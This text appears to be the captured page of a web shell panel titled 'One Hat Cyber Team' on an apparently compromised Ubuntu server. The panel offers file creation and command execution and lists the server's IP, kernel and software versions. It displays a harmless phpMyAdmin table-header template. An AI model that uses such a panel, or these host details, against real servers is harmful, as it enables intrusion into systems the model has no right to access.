⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.77
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
server
/
databases
/
View File Name :
table_header.twig
<thead> <tr> {% if is_superuser or allow_user_drop_database %} <th></th> {% endif %} <th> <a href="server_databases.php{{ Url_getCommon(url_params) }}"> {% trans 'Database' %} {{ sort_by == 'SCHEMA_NAME' ? Util_getImage( 's_' ~ sort_order, sort_order_text ) }} </a> </th> {% for stat_name, stat in column_order %} {% if stat_name in first_database|keys %} {% set url_params = url_params|merge({ 'sort_by': stat_name, 'sort_order': sort_by == stat_name and sort_order == 'desc' ? 'asc' : 'desc' }) %} <th{{ stat['format'] is same as('byte') ? ' colspan="2"' }}> <a href="server_databases.php{{ Url_getCommon(url_params) }}"> {{ stat['disp_name'] }} {{ sort_by == stat_name ? Util_getImage( 's_' ~ sort_order, sort_order_text ) }} </a> </th> {% endif %} {% endfor %} {% if master_replication %} <th>{% trans 'Master replication' %}</th> {% endif %} {% if slave_replication %} <th>{% trans 'Slave replication' %}</th> {% endif %} <th>{% trans 'Action' %}</th> </tr> </thead>